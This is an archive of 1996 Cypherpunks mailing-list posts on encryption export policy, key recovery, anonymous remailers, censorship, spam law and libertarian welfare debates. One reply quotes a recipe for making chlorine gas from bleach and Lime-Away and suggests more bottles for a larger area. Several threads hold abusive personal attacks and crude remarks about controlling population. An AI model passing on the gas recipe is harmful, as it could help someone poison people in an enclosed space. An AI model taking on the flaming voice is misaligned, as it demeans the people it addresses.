The Econmic league is not run by the UK Conservative party directly, in the same way that the Willie Horton ads were not run by the Bush campaign.. They escape the Data Protection Act by virtue of keeping all this information in filing cabinets (at least, they claim to.) Simon --- Cause maybe (maybe) | In my mind I'm going to Carolina you're gonna be the one that saves me | - back in Chapel Hill May 16th. And after all | Email address remains unchanged You're my firewall - | ........First in Usenet......... From weld at l0pht.com Mon Sep 16 16:32:08 1996 From: weld at l0pht.com (Weld Pond) Date: Tue, 17 Sep 1996 07:32:08 +0800 Subject: IBM Boosts Encryption Initiative Message-ID: http://www.pcweek.com/news/0916/16enc.html IBM will roll out several security initiatives next month that include a new way to build encryption into software and technology that could enable U.S. companies to export products with strong encryption algorithms. and uhhh... IBM also will introduce several "key-recovery" technologies that could enable businesses to export encrypted data or software beyond the current 40-bit limit--without breaking U.S. government restrictions and whoa... The sources also added that the technology may satisfy the requirement imposed by the U.S. government that it be able to access encrypted data on demand. Weld Pond - weld at l0pht.com - http://www.l0pht.com/~weld L 0 p h t H e a v y I n d u s t r i e s Technical archives for the people - Bio/Electro/Crypto/Radio From junger at pdj2-ra.F-REMOTE.CWRU.Edu Mon Sep 16 16:54:54 1996 From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger) Date: Tue, 17 Sep 1996 07:54:54 +0800 Subject: That Evil Internet, Pt. XXIII In-Reply-To: Message-ID: <199609161708.NAA26581@pdj2-ra.F-REMOTE.CWRU.Edu> snow writes: : : WARNING: DANGEROUS. : : Simple advice for the manufacture of Chlorine Gas (similar enough to : mustard gas that it has the same effect). : : 1 bottle of Chlorine Bleach. : 1 Bottle of lime-away. 
: : Hold Breath, mix in open container. Clear the building before you breath : e : again. : : Use more bottles for a larger area. : : I did this accidentally when I was young (16), foolish and working : for a hospital. That it happened at work (_very_ small amounts of both bleach : and lime-away) made the Emergency Room visit free and quick. No permanent : damage, but I was lucky. : Or one can use the technique my father accidentally discovered when he was in school and wanted to electrolyze water. He made himself a cell out of a broken light bulb (and wired it in series with a good light bulb) and then realized that he did not have any sulphuric acid lying around to use as a catalyst. So he used table salt instead. -- Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu URL: http://samsara.law.cwru.edu From dlv at bwalk.dm.com Mon Sep 16 16:58:52 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 17 Sep 1996 07:58:52 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <9608168428.AA842891743@smtplink.alis.ca> Message-ID: jbugden at smtplink.alis.ca writes: > dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) wrote: > >Starting with the lying old fart himself. > > You shouldn't be so hard on Tim. I tried giving up farting years ago but I = > found > I gained a lot of weight. It's also become more socially acceptable as evid= I wonder why containing one's fart would cause one to gain weight. Volume maybe, but I'd think that gas weight about as much as the air it displaces. Cheers, --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From merriman at amaonline.com Mon Sep 16 17:05:43 1996 From: merriman at amaonline.com (David K. 
Merriman) Date: Tue, 17 Sep 1996 08:05:43 +0800 Subject: Snake Oil FAQ 0.4 [comments appreciated] Message-ID: <199609161705.KAA26825@toad.com> -----BEGIN PGP SIGNED MESSAGE----- To: cypherpunks at toad.com Date: Mon Sep 16 12:05:17 1996 > (First off, I'd like to thank Matt for doing this.) > > The key length stuff is good, but a common component of snake oil is > that it claims to have very long key sizes. > > | Some ciphers, while currently secure against most attacks, are not > | considered viable in the next few years because of relatively small > keysizes > | and increasing processor speeds (making a brute-force attacks > feasible). The > | tables below should give some general guidelines for making intelligent > | decisions about the key length you need. If the key is too short, the > system > | will be easily broken, even if the cipher is a good one. > | > | In [1] and [2], we're presented with some guidelines for deciding > | appropriate key length. (It is important to note that this is based on > the > | ability to predict computing power 40, 65, and 100 years from now. > Major > | breakthroughs in computing power 30 years from now might render > everything > | on this chart kiddieplay.) > > | * One-Time-Pads > | > | A vendor might claim the system uses a one-time-pad (OTP), which > is > | theoretically unbreakable. That is, snake-oil sellers will try > to > | capitalize on the known strength of a OTP. It is important to > | understand that any variation in the implementation means that it > is > | not an OTP, and has nowhere near the security of an OTP. > | > | A OTP system is not an algorithm. It works by having a "pad" of > random > | bits in the possession of both the sender and recipient. The > message is > | encrypted using the next n bits in the pad as they key, where n > is the > | number of bits in the message. After the bits are used from the > pad, > | they're destroyed, and can never again be used. 
The bits in the > pad > | must be truly random, generated using a real random source, such > as > | specialized hardware, radioactive decay timings, etc., and not > from an > | algorithm or cipher. Anything else is not a one-time-pad. > > The phrase easy-to-use should not appear in proximity to one > time pad, except in the context 'Easier key management than a one time > pad!" > I would also suggest that the generation of OTP 'pads' for users is *highly* questionable. Who else is getting a copy of them, assuming they're even valid? Dave Merriman - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- PGP Email welcome, encouraged, and PREFERRED. Visit my web site at http://www.shellback.com/p/merriman for my PGP key and fingerprint "What is the sound of one hand clapping in a forest with no one there to hear it?" I use Pronto Secure (tm) PGP-fluent Email software for Windows -----BEGIN PGP SIGNATURE----- Version: 2.6.2 -----END PGP SIGNATURE----- From unicorn at schloss.li Mon Sep 16 17:14:41 1996 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 17 Sep 1996 08:14:41 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <199609160537.HAA26159@basement.replay.com> Message-ID: On Mon, 16 Sep 1996, Anonymous wrote: > Tim May wrote: > > > The thing about _traditional_ charity, of the religious or community sort, > > was that it was not treated as an "entitlement," as something the resentful > > masses could "demand" as part of their "human rights." 
> > There's no substantial difference between their resentful whining about > their rights Such as the "right" to health insurance, the "right" to free checks for sitting on one's chair, the "right" to be treated preferentially as equally qualified non-minorities applying to the same job, the "right" to housing, the "right" to free education, the "right" to be paid three times what your labor is worth in the lowest bracket jobs. > and your resentful whining about your rights The right to personal property. Beginning to get the picture? All of the former were created in the last 60 years out of whole cloth more as "revolution insurance" than anything else. They are rights because someone said they were, not because they are well or logically grounded. > - except maybe that you whine more. I should hope he does. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 16 18:15:03 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Tue, 17 Sep 1996 09:15:03 +0800 Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL Message-ID: <01I9JR9M8PLC8Y4X3Y@mbcl.rutgers.edu> From: IN%"gnu at toad.com" "John Gilmore" 16-SEP-1996 10:13:36.24 >While you are at it, you could move just the censored material to a >separate IP address from the rest of the archives, and issue Web >redirects for requests sent to the old address. In fact it might be >interesting to redirect readers to various mirror sites automatically, >at random and in rotation. Thus, when someone connects to your web >site to read censored material, they will be automatically redirected >to one of dozens or hundreds of other places where the material can be >found. The German censors will likely find it impossible to block >access to all those sites (and each such site can also be changing its >IP address periodically). 
The first part (redirection at random) can be done via a CGI script; this may be useful for those wishing to put in links to a mirror site without having to choose a particular one or host it themselves. Incidentally, speaking of mirror sites, I'd be interested in locating scripts to do the following: A. Automatically redirect someone to an appropriate mirror site based upon closeness to their originating IP address B. Automatically poll (via crontab or similar mechanisms) between mirror sites (and to the anonymizer) to see if they're up, using the first part to redirect accordingly. -Allen From dlv at bwalk.dm.com Mon Sep 16 18:16:35 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 17 Sep 1996 09:16:35 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: Message-ID: <4R4cuD3w165w@bwalk.dm.com> tcmay at got.net (Timothy C. May) writes: > I have never argued against insurance! People who wish to buy insurance are > welcome to, obviously. Tim doesn't understand the difference between a private insurance participation in which is voluntary (most life insurance in the U.S., most retirement savings plans) and a government-mandated scam like Social Security. I fart in your general direction. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From declan at well.com Mon Sep 16 18:22:01 1996 From: declan at well.com (Declan McCullagh) Date: Tue, 17 Sep 1996 09:22:01 +0800 Subject: IBM_gak Message-ID: > 9-13-96. BuWi: > > "Revolutionary Intranet security product to be > demonstrated at Interop DotCom " > > DSN's NetFortress fully automates hardware-based > authentication, encryption and key exchange into a > plug and play solution. It completely eliminates the > possibility of IP spoofing, eavesdropping and > break-ins. 
"After installing it, I couldn't even tell > which service a given packet was from - everything but > the packet header itself was rendered undecipherable > as it traversed the Internet." DSN Technology was > founded by Dr. Aharon Friedman and Andy Savas. Thanks, John, for forwarding. I spoke with the DSN folks today. They developed NetFortress in the U.S. and have recently found a substantial overseas market for it. "That's definitely a problem for us. We're actively lobbying senators to pass procode, to get it out of committee." Since of course multinationals would be unwilling to use DSN stuff under current export-control regime. -Declan From dlv at bwalk.dm.com Mon Sep 16 18:28:28 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 17 Sep 1996 09:28:28 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <323D6B95.7BC9@tivoli.com> Message-ID: Mike McNally writes: > jbugden at smtplink.alis.ca wrote: > > > > > A social safety net is simply a form of health and life > insurance. > > And a really neat-o form it is, too! All it takes is an armed force > to coerce the unwilling into paying the premiums of those who don't > pay their own. Yeah, and Social Security is a retiremend fund. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From craigw at dg.ce.com.au Mon Sep 16 18:32:46 1996 From: craigw at dg.ce.com.au (craigw at dg.ce.com.au) Date: Tue, 17 Sep 1996 09:32:46 +0800 Subject: 56 kbps modems Message-ID: <199609162239.IAA24591@mac.ce.com.au> That I realize that baud and bit/sec are not the same, but I feel you would have a hard time getting a 56k modem to work on a line that does not support 28.8k fully, let alone 33.6k. A leased line (copper pair) from telstra only supports 9.6k and costs close to ISDN. 
When the telco reinstalls the literal tons of copper cable that we have lying underground for at least 20 years in some instances that connects the exchanges, and replaces this with optic fibre preferably, or at least higher bandwidth co-ax, we will not have 28k even. In the states you have better lines and ISDN is far less expensive. For two B channels permanently connected I have to pay about $2500/month in this country. Not many home users can pay this, thus they have to still use modems. With the lack of bandwidth to and from the exchanges, there is not a chance in hell a 56k modem will work in this country for many years. (Australia - the lucky country...not in regards to bandwidth) > As I am sure has been discussed at length before, baud does not equal > bps. AFAIK, V32bis is only 2400baud. Soon, we may all be staring at our computers, wondering whether they're staring back. [Network Admin For WPA Business Products. aka doshai >;-) ] http://pip.com.au/~doshai/ Key fingerprint = 2D F4 54 BB B4 EA F1 E7 B6 DE 48 92 FC 8D FF 49 Send a message with the subject "send pgp-key" for a copy of my key. (if I want to give it to you) From dlv at bwalk.dm.com Mon Sep 16 18:39:59 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 17 Sep 1996 09:39:59 +0800 Subject: IBM_gak In-Reply-To: Message-ID: Lucky Green writes: > Aparently, Al Gore's recent phone calls to everybody who is anybody in the > industry have paid off. After HP, TIS, and other unnamed parties, now IBM > is supporting GAK. Folks, this battle is lost. Domestic GAK is coming to > a PKI near you. 
Apparently, senile Tim May (fart) is a Clinton administration troll planted here to sabotage any discussions of actual crypto work and to flood this mailing list with lies and personal attacks and to make it unusable. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From smith at sctc.com Mon Sep 16 18:41:27 1996 From: smith at sctc.com (Rick Smith) Date: Tue, 17 Sep 1996 09:41:27 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <199609162224.RAA12536@shade.sctc.com> Asgaard wrote: : .... But suppose the population problem could : be fixed. Then, with technology escalating towards singularity, : machines doing almost all labor, there could certainly exist a : system where the 'dumb' and 'lazy' could be fed and housed properly : without anybody complaining. I'm always fascinated when people trot out this notion of technology giving us a maintenance free world that provides all our needs. Like Rifkin's "End of Work." I'm sorry but I just don't see how the problems of food and shelter are solved simply because we've automated the production of bank statements. All the really effective automation has involved symbolic activities, not the basic stuff of life, like food and shelter. : P.S. Mac Donalds could easily be replaced by a bot. Very unlikely. Despite the incredible degree of mechanization that happens in food production, *most* of it requires people in the loop. Part of it is health concerns -- you're far more likely to poison a significant portion of the population if you don't keep active human involvement in food production. But there's also a lot having to do with the structure of the work. You *can't* send a robot tractor into the fields and expect it to treat your corn right. And milking machines, well .... I did a lot with fault tolerance and industrial robotics in a previous life. Robots work fine in highly structured environments. Their value decreases dramatically as you remove structure. 
In unstructured environments they're either useless or just plain dangerous. Even the so called "industrialized" farms are wildly unstructured compared to a factory floor. And there's little reason to assume that 'biological units' (plants and animals produced for food) in a fully structured factory-like setting will yield all the products necessary for an adequate food supply. It seems that whenever we develop a "complete" model of what people need to survive and subject a few people to it, we discover that something fatal has been left out. : But to force people into menial service jobs just to literally : survive is not to my taste. No, give them minimal shelter for : nothing and from there on let the market anarcho-capitalistic : struggle begin, for obtaining a higher than minimum material : standard or reputational standing. I suspect that the Real World will always require a large portion of the available labor pool to do work that supports the production of food and shelter. The support has gotten pretty indirect in modern industrialized countries, I admit. Rick. smith at sctc.com From stewarts at ix.netcom.com Mon Sep 16 18:41:57 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Tue, 17 Sep 1996 09:41:57 +0800 Subject: HipCrime as MetaSPAM Message-ID: <199609161835.OAA01055@attrh1.attrh.att.com> The Hippie Of Crime also asked that remailer operators not block HipCrime SPAM deliveries and all mail to HipCrime because people might be interested in his cool fractals and Java neural net lotto-predicters and anarchist pages. If he wants to advertise to people about his other cool products, he doesn't need to do it anonymously. Furthermore, he doesn't provide any method in his web pages for users to anonymously request information, or to have information delivered anonymously. So blocking him from the remailers won't lose him anything. 
# Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From markm at voicenet.com Mon Sep 16 18:42:02 1996 From: markm at voicenet.com (Mark M.) Date: Tue, 17 Sep 1996 09:42:02 +0800 Subject: J'accuse!: Whitehouse and NSA vs. Panix and VTW In-Reply-To: <2.2.32.19960916190033.010773d0@vertexgroup.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Mon, 16 Sep 1996, John F. Fricker wrote: > Well IPSec provides for authentication of endpoints which would identify the > syn attacker. > > What amazes me is that routers happily pass packets with foreign IP return > addresses. I guess there is some valid utility to being able to originate a > connection that actually goes somewhere else for initiating a many to many > protocol. But I can't think of any practical application that would > necessarily be that way. > > So why do routers let packets leave local networks that do not appear to > originate from said local network? Doesn't routing work "both ways" so to speak? Probably the same reason that most routers let packets claiming to be from the local net through. Even those that do filter packets claiming to be from the local net don't have any real reason to block packets claiming to be from foreign addresses -- the administrators don't have anything to gain. It'll probably take some time before this is considered standard netiquette. - -- Mark PGP encrypted mail preferred. 
Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv -----END PGP SIGNATURE----- From liberty at gate.net Mon Sep 16 18:46:05 1996 From: liberty at gate.net (Jim Ray) Date: Tue, 17 Sep 1996 09:46:05 +0800 Subject: Judge Kozinski Responds Message-ID: <199609162121.RAA24934@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: cypherpunks at toad.com Date: Mon Sep 16 17:18:36 1996 cypherpunks: I have been having a private e-mail conversation with Judge Alex Kozinski of the 9th circuit. Today he said: >Jim: Feel free to clarify my position to your comrades >(excuse the term) if you think it will be useful. I guess >I'll keep thinking about this stuff and may change my mind >on some things. ... In a previous message to me in response to cypherpunks messages mentioning him which I forwarded, he said: >The statement about anonymous remailers was largely >accurate. I'm not sure that the fact that you (or some of >your associates) are willing to block people from getting >anonymous mail is a sufficient safeguard. Some may not be, >and it only takes one or two who do not adhere to the code >to make life miserable for the rest of us. > >We agree about the need for privacy, but I'm not at all sure >why the right to send messages anonymously trumps the >recipient's right to know who's addressing him. Getting an >anonymous message--even one that is not harassing or >threatening--is an invasion of my privacy. 
As for Me: [Please note, this statement caused me to block his address from WinSock messages, but _NO_ I will not give you his e-mail address, so please do not ask me to unless I _know_ you are a remailer-operator, and you send me a PGPmessage including your key and asking for it for blocking reasons ONLY. So far, nobody has been stupid enough to try to use the remailers to harass him. I DON'T want this man harassed, and having him understand "our" point of view will be a "big cypherpunk win"(tm) IMNSHO, so please trust me to represent you fairly. Thanks.] On with the Judge: >Halloween, it only really works when the people dressed up >are about four feet tall. In the rare instances where there >have been adults at my door that were so disguised you >couldn't tell who they were, I felt threatened--kept my >Glock handy before opening door. > >The quote about morphed children's images was sort of >botched, as was my assessment of the Third Circuit's case. >What I said about children is that morphed images did not >involve normal exploitation of children so it would not >clearly fall in the unprotected category, but that there may >be other harms I'd have to think about before deciding. >As for the Third Circuit's opinion, I said at the outset >they got it right in the bottom line; what I criticized was >their use of analogies to deal with the problem. I find >that much thinking about the net is analogy-driven and that >analogies are inherently imprecise and can be misleading. > >Anyway, thanx for bearing with me. There's a lot of this >stuff I have not made up my mind about and I find talking >about it helps shape my thinking. Folks, we have a chance to win or lose, depending on list.maturity and common sense. If this man is harassed, convincing him will become harder for me, and I will be very annoyed. If you make a coherent comment that covers ground that I have not already covered with him, I will forward it on to him. 
Alex Kozinski is IMO, by far, the closest thing to a libertarian that Reagan ever appointed, and in both messages he has mentioned having an open mind. Let's try not to give him a reason to close it. Thanks for trusting me, and thanks in advance for behaving nicely and respecting the judge's privacy. JMR Regards, Jim Ray -- DNRC Minister of Encryption Advocacy "As govt.s grow arithmetically, corruption grows exponentially." -- Ray's Law of official corruption. Defeat the Duopoly! Stop the Browne out. Harry Browne for President. Jo Jorgensen for Vice-president. http://www.HarryBrowne96.org/ http://www.twr.com/stbo ___________________________________________________________________ PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 I will generate a new (and bigger) PGP key-pair on election night. http://www.shopmiami.com/prs/jimray ___________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 -----END PGP SIGNATURE----- From dlv at bwalk.dm.com Mon Sep 16 18:46:12 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 17 Sep 1996 09:46:12 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <199609161427.QAA05854@basement.replay.com> Message-ID: <8L4cuD2w165w@bwalk.dm.com> nobody at replay.com (Anonymous) writes: > Tim is not productive. He *was* productive, but not anymore; his wealth Tim has no life. That's why he posts lies, personal attacks, and flame bait to this mailing list and drives away any and all crypto discussion. > > In most societies this is considered the difference between a child and > > an adult... 
> > This is a silly statement of the kind often made by people who have no > solid grasp of history or social organization: most societies that > radically differ from our own in their ways of maintaining/supervising > their members (successful or not) have apparatuses so invasive and > arbitrary that, in comparison, the IRS and assorted other bureaucracies > look pretty benign. Yes - he's a typical mediocre product of the U.S. public education system. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From editor at cdt.org Mon Sep 16 18:46:57 1996 From: editor at cdt.org (Bob Palacios) Date: Tue, 17 Sep 1996 09:46:57 +0800 Subject: CDT Policy Post 2.31 - Join Rep. Eshoo Online, Tues. 9/16, 8:00 EDT Message-ID: ----------------------------------------------------------------------------- The Center for Democracy and Technology Volume 2, Number 31 ---------------------------------------------------------------------------- A briefing on public policy issues affecting civil liberties online ---------------------------------------------------------------------------- CDT POLICY POST Volume 2, Number 31 September 16, 1996 CONTENTS: (1) Join Rep. Anna Eshoo (D-CA) Live Online Tuesday Sept 17, 8:00 pm EDT (2) How to Subscribe/Unsubscribe (3) About CDT, contacting us ** This document may be redistributed freely with this banner intact ** Excerpts may be re-posted with permission of ** This document looks best when viewed in COURIER font ** ----------------------------------------------------------------------------- (1) Join Rep. 
Anna Eshoo (D-CA) Live Online Tuesday Sept 17, 8:00 pm EDT Representative Anna Eshoo (D-CA) will be live online on Tuesday September 17 at 8:00 pm EDT (5:00 pm PDT) to discuss her efforts to bring privacy and security to the Internet through the reform of US encryption policy. Eshoo will also take questions from Netizens during the discussion. Representative Eshoo, who represents the heart of California's Silicon Valley, is a co-sponsor of HR 3011, the "Security and Freedom through Encryption (SAFE) Act of 1996", a founding member of the Congressional Internet Caucus, and a strong advocate for enlightened Internet policies. Momentum in Congress for real reform of US encryption policy remains strong. The House Judiciary Committee is scheduled to hold a hearing on HR 3011 on Wednesday September 25, 1996, and the Senate Commerce Committee is expected to vote on the Burns/Leahy "Pro-CODE" bill (S. 1726) soon. DETAILS ON HOW TO PARTICIPATE IN THE DISCUSSION: At 8:00 pm EDT (5:00 pm PDT), point your browser to: http://www.hotwired.com/wiredside/ To participate you will need to have RealAudio installed on your computer (available free at http://www.realaudio.com/). You also need to be a registered HotWired member (there is no charge for registration - visit http://www.hotwired.com/ for details). This forum is the 6th in a series of events organized by the Center for Democracy and Technology and the Voters Telecommunications Watch with the purpose of bringing the Internet Community into the debate over critical Internet policy issues. 
For further information, please visit the following sites: * For Background on the Encryption Issue: The Encryption Policy Resource Page: http://www.crypto.com/ CDT's Encryption Policy Issues Page: http://www.cdt.org/crypto/ * For details on Congress and the Internet: CDT's Congress and the Net Page http://www.cdt.org/net_congress/ Voters Telecommunications Watch: http://www.vtw.org/ HotWired's WiredSide Chat: http://www.hotwired.com/ ----------------------------------------------------------------------- (2) SUBSCRIPTION INFORMATION Be sure you are up to date on the latest public policy issues affecting civil liberties online and how they will affect you! Subscribe to the CDT Policy Post news distribution list. CDT Policy Posts, the regular news publication of the Center For Democracy and Technology, are received by nearly 10,000 Internet users, industry leaders, policy makers and activists, and have become the leading source for information about critical free speech and privacy issues affecting the Internet and other interactive communications media. To subscribe to CDT's Policy Post list, send mail to policy-posts-request at cdt.org with a subject: subscribe policy-posts If you ever wish to remove yourself from the list, send mail to the above address with a subject of: unsubscribe policy-posts ----------------------------------------------------------------------- (3) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US The Center for Democracy and Technology is a non-profit public interest organization based in Washington, DC. The Center's mission is to develop and advocate public policies that advance democratic values and constitutional civil liberties in new computer and communications technologies. 
Contacting us: General information: info at cdt.org World Wide Web: URL:http://www.cdt.org/ FTP URL:ftp://ftp.cdt.org/pub/cdt/ Snail Mail: The Center for Democracy and Technology 1634 Eye Street NW * Suite 1100 * Washington, DC 20006 (v) +1.202.637.9800 * (f) +1.202.637.0968 ----------------------------------------------------------------------- End Policy Post 2.31 9/16/96 ----------------------------------------------------------------------- From iang at cs.berkeley.edu Mon Sep 16 18:53:26 1996 From: iang at cs.berkeley.edu (Ian Goldberg) Date: Tue, 17 Sep 1996 09:53:26 +0800 Subject: Unsolicited email advertising already illegal in US? Message-ID: <199609162154.OAA08632@abraham.cs.berkeley.edu> This piece from RISKS looks interesting. My computer certainly _is_ "equipment which has the capacity to transcribe text or images (or both) from an electronic signal received over a regular telephone line onto paper." Now, are HipCrime et al. liable for $500 in damages for each piece of spam? If so, where do I sign up? - Ian - ---8<---8<--- Date: Thu, 12 Sep 1996 19:46:42 -0400 From: Dan Franklin Subject: Sometimes junk e-mail is already a fax, legally speaking I've been using the following legal information, which I picked up from another mailing list (Keith Bostic's /dev/null list), in my responses to junk e-mail these days. So far I haven't yet received junk e-mail on my home computer while it had a printer attached, but one of these days... Under US Code Title 47, Sec.227(b)(1)(C): "It shall be unlawful for any person within the United States to use any telephone facsimile machine, computer, or other device to send an unsolicited advertisement to a telephone facsimile machine" A "telephone facsimile machine" is defined in Sec.227(a)(2)(B) as: "equipment which has the capacity to transcribe text or images (or both) from an electronic signal received over a regular telephone line onto paper."
Under this definition, an e-mail account, modem, computer and printer together constitute a fax machine. The rights of action are as follows. Under Sec.227(b)(3)(B): "A person or entity may, if otherwise permitted by the laws or rules of court of a State, bring in an appropriate court of that State -- (A) an action based on a violation of this subsection or the regulations prescribed under this subsection to enjoin such violation, (B) an action to recover for actual monetary loss from such a violation, or to receive $500 in damages for each such violation, whichever is greater, or (C) both such actions. If the court finds that the defendant willfully or knowingly violated this subsection or the regulations prescribed under this subsection, the court may, in its discretion, increase the amount of the award to an amount equal to not more than 3 times the amount available under subparagraph (B) of this paragraph." For the full legal text USC Title 47, Section 227, see: http://www.law.cornell.edu/uscode/47/227.html Dan Franklin dfranklin at bbn.com From daw at cs.berkeley.edu Mon Sep 16 18:59:16 1996 From: daw at cs.berkeley.edu (David Wagner) Date: Tue, 17 Sep 1996 09:59:16 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: Message-ID: <199609162254.PAA05380@joseph.cs.berkeley.edu> In article , Lucky Green wrote: > On Sun, 15 Sep 1996, Dale Thorn wrote: > > Just a comment: "The world population really should go back to around > > one billion", etc. And how could we achieve that without severe govt. > > oppression, one wonders? > > Quite simple. End all food and medical aid to developing countries paid > for with money stolen at gunpoint from our citizens.
Or make Norplant > implants the condition for financial/in kind aid. Both US and > abroad. Why stop there? Make biometric ID implants the condition for welfare and financial aid, so we can track them in case they spend it on (gasp!) donations to the Libertarian party. Government scholarships for education and research? Better wiretap their phones & emails, in case the recipients use the scholarships to work on strong non-GAKed cryptography. Hell, folks are also taking advantage of government money every time they step foot on a park or government road: might as well require citizen-units to escrow their identity and confiscate their guns as a condition of usage. ``Buckle your thought-escrow-unit, it's the law!'' From jbugden at smtplink.alis.ca Mon Sep 16 19:09:50 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Tue, 17 Sep 1996 10:09:50 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <9608168429.AA842914706@smtplink.alis.ca> jbugden at smtplink.alis.ca wrote: > By spreading the risk you minimize the cost. m5 at tivoli.com wrote: >Yea right. Actually, yes. Canada has a single payer system and we spend about two thirds as much as the U.S. on health care as a percentage of G.N.P. We manage to insure all Canadians while about 35% of people in the U.S. have *no* health insurance. Yes, the insurance premium is not optional. Yes, it *is* cheaper. Ciao, James From shamrock at netcom.com Mon Sep 16 19:20:52 1996 From: shamrock at netcom.com (Lucky Green) Date: Tue, 17 Sep 1996 10:20:52 +0800 Subject: Free RSA chip Message-ID: I secured a 30 page data sheet for the new NTT (actually NLC, a subsidiary of NTT) RSA accelerator chips. The NLC0048 LSI chip can handle keys up to 1024 bits. The secret key can be stored on-chip. If you want a copy of the data sheet, email me your fax number. 
Furthermore, I have *one* sample chip that I am willing to loan to somebody in the SF Bay Area with sufficient hardware knowledge to put the chip to good use. If you think you qualify, let me know who you are and why you think that you should get the chip. I apologize in advance to the qualified candidates that do not get the chip. There is only one (that I can loan out). --Lucky From jimbell at pacifier.com Mon Sep 16 19:27:09 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 17 Sep 1996 10:27:09 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <199609162031.NAA23954@mail.pacifier.com> At 02:00 AM 9/16/96 -0700, Timothy C. May wrote: >As to the "social safety net," things are far, far beyond a simple safety >net. When 14-year-old pregnant inner city girls are given money to set up >their own households (cf. Charles Murray's "Losing Ground"), this is not a >"safety net," this is subsidized breeding. A friend of mine (who can be just as coarse as I) calls them "Welfare-powered bastard factories." Jim Bell jimbell at pacifier.com From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 16 19:29:52 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Tue, 17 Sep 1996 10:29:52 +0800 Subject: Edited Edupage, 15 Sept 1996 Message-ID: <01I9JSD6BN2K8Y4X3Y@mbcl.rutgers.edu> From: IN%"educom at educom.unc.edu" 16-SEP-1996 10:15:59.50 >To: IN%"edupage at elanor.oit.unc.edu" "EDUCOM Edupage Mailing List" >************************************************************ >Edupage, 15 September 1996. Edupage, a summary of news about information >technology, is provided three times a week as a service by Educom, >a Washington, D.C.-based consortium of leading colleges and universities >seeking to transform education through the use of information technology. 
>************************************************************ >SATELLITE BROADCASTERS MUST PROVIDE EDUCATION, TOO >A federal appeals court in Washington has ruled that any company providing >direct broadcast satellite (DBS) services must "reserve a portion of its >channel capacity, equal to not less than 4 percent nor more than 7 percent, >exclusively for noncommercial programming of an educational or information >nature," in compliance with regulations drafted by the FCC to enforce laws >enacted in 1984 and 1992. The unanimous decision rejected arguments by Time >Warner and other broadcasters that the law interfered with their First >Amendment rights. "It is the right of the viewers and listeners, not the >right of the broadcasters, which is paramount," said the court, quoting a >1969 Supreme Court ruling. (Chronicle of Higher Education 13 Sep 96 A29) Bloody socialist Supreme Court... sell the _full_ rights, then use the money to reduce taxes. >SYSTEM CRACKER GOT RECIPE FROM HACKER MAGAZINE >The person who disabled New York's Panix Internet service probably followed >the line-by-line instructions for doing so that appeared in the latest issue >of 2600 magazine, the Hacker's Quarterly. "We need to educate the community >that it's very, very simple to cause massive mayhem," says 2600's editor, >who defended his editorial judgment. "A lot of companies subscribe to us so >they can learn before they're victimized." Panix's co-owner says he >supports 2600's right to publish such information: "As a matter of >principle I don't think they should have been stopped," but adds that unlike >most other recipes for breaching security published in the magazine, this >one has no known technical defense. (Wall Street Journal 13 Sep 96 B5) Helpful to quote Panix on it. >Edupage is written by John Gehl & Suzanne Douglas >. Voice: 404-371-1853, Fax: 404-371-8057. >Technical support is provided by Information Technology Services at the >University of North Carolina at Chapel Hill. 
